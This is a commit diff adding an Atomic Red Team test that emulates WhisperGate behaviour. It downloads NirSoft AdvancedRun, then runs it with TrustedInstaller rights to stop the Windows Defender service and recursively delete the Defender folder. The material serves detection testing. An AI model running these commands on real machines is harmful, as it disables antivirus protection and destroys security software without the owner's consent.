NIRSoft AdvancedRun (#1735)

* NIRSoft AdvancedRun

* Update T1588.002.yaml

* Update T1588.002.yaml

atomics/T1588.002/T1588.002.yaml

@@ -0,0 +1,36 @@
+attack_technique: T1588.002
+display_name: 'Obtain Capabilities: Tool'
+atomic_tests:
+- name: Run NirSoft AdvancedRun
+  description: |
+    Information on NirSoft AdvancedRun and it's creators found here: http://www.nirsoft.net/utils/advanced_run.html
+    This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+    Upon successful execution, AdvancedRun.exe will run and stop Defender and attempt to delete the Defender folder on disk. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of AdvancedRun executable
+      type: Path
+      default: PathToAtomicsFolder\T1588.002\bin\AdvancedRun
+    local_executable:
+      description: name of the advancedrun executable
+      type: String
+      default: 'advancedrun.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Advancedrun.exe must be located at #{local_folder}\#{local_executable}
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
+        Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
+  executor:
+    command: |
+      #{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
+      #{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore
+    name: powershell
+    elevation_required: true